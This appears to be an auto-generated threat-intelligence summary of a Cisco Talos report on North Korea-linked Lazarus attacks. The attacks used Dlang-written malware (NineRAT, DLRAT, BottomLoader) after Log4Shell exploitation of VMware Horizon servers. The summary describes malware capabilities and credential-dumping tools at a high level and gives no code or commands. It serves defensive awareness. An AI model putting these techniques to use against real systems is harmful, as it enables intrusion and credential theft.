December 11, 2023 at 10:12AM
Lazarus, a North Korea-linked hacking group, has been using the Dlang malware in attacks on organizations in manufacturing, agriculture, and physical security sectors. Cisco’s Talos security researchers identify Lazarus as the perpetrator of these attacks, using the NineRAT, DLRAT, and BottomLoader malware families against unpatched systems. The attacks are related to the Log4Shell vulnerability and involve the exploitation of internet-accessible VMware Horizon servers. The Dlang programming language has been attracting malware developers due to its versatility and easy learning curve.
Key takeaways from the meeting notes are:
– Lazarus, a North Korea-linked hacking group, has been observed deploying Dlang malware in attacks against organizations in the manufacturing, agriculture, and physical security sectors.
– Dlang is an uncommon programming language for malware development but is being used due to its versatility and easy learning curve, allowing for cross-compile applications for multiple architectures.
– Three malware families built using Dlang, including NineRAT, DLRAT, and BottomLoader, have been used by Lazarus in attacks.
– Operation Blacksmith involved the deployment of NineRAT against a South American agricultural organization and a European manufacturing business. The attacks overlap with activity attributed to the North Korean group Onyx Sleet.
– The NineRAT malware uses Telegram for receiving commands, achieves persistence, and is capable of system information harvesting, file upload/download, and self-uninstall.
– The BottomLoader downloader fetches and executes a payload from a hardcoded URL and achieves persistence for newer versions.
– DLRAT functions as a downloader and backdoor, including commands for system reconnaissance.
– Lazarus exploited the Log4Shell vulnerability for initial access, followed by reconnaissance and deployment of the HazyLoad implant, alongside the use of utilities for credential dumping such as ProcDump and MimiKatz.
These takeaways provide a clear understanding of the activities and techniques employed by Lazarus, as well as the specific malware families and vulnerabilities they have targeted.